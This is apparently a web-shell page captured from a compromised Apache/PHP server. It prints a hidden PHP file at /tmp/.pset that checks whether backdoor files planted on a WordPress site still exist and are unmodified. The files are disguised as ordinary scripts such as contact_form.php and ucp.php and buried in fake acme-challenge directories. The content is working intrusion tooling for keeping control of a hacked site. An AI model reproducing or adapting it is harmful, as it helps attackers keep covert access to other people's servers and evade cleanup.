HEX
Server: Apache/2.4.56 (Unix) OpenSSL/1.0.2k-fips
System: Linux host.nohasslegoals.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
User: nohass (1001)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: //tmp/.pset
<?php   $r = '/home/aligninm/discover.aligninmotion.com'; $x = ["/wp-content/well-known/acme-challenge/d/d/g/d/contact_form.php"=>"bd@@4179@@774",
"/wp-content/well-known/acme-challenge/a/c/h/f/sais_inv_step3.php"=>"bd@@37356@@1001",
"/wp-content/well-known/acme-challenge/a/h/d/c/config.default.php"=>"bd@@37357@@940",
"/wp-content/well-known/acme-challenge/b/a/b/f/ucp.php"=>"bd@@37358@@982",
"/wp-content/well-known/acme-challenge/b/a/f/f/journal.php"=>"bd@@37359@@956",
"/wp-content/well-known/acme-challenge/b/e/f/a/File_Operations.php"=>"bd@@37360@@910",
"/wp-content/well-known/acme-challenge/d/d/g/d/mysql.dbi.lib.php"=>"bd@@4598@@965"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');